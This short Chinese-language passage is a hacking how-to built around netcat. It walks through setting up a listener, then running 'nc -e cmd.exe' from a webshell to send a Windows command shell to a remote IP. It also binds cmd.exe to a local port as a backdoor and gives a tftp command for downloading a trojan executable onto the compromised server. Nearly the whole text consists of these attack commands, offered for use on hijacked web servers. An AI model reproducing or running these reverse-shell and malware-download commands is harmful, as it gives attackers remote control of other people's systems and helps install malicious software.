nc -l -v -p 80在本機監聽80端口,此時80端口是打開的,我們可以在瀏覽器輸入127.0.0.1進行瀏覽,此時就會出現連接,我們再在監聽窗口輸入字符,就會在瀏覽器上顯示了。知道上面的作用后,我們就可以在此的基礎上,再在webshell里面執行 nc -e cmd.exe 192.168.246.1 80此條命令會把cmd反彈到192.168.246.1上,我們就可以想在本地一樣,使用cmd。 這里是nc的命令說明: -l 監聽本地入棧信息 -p port 打開本地端口 -t 以telnet形式應答入棧請求 -e 程序重定向 D:\www\aram\nc -l -p 110 -t -e D:\www\aram\cmd.exe 傳馬命令:tftp -i ip地址 get 木馬名字.exe 如果不懂的話看這里的教程:http://www.baidu.com/s?wd=NC反彈提權+site%3Apan.baidu.com&rsv_bp=0&ch=1&tn=98012088_3_dg&bar=&rsv_spt=3&ie=utf-8&rsv_n=2&rsv_sug3=1&rsv_sug1
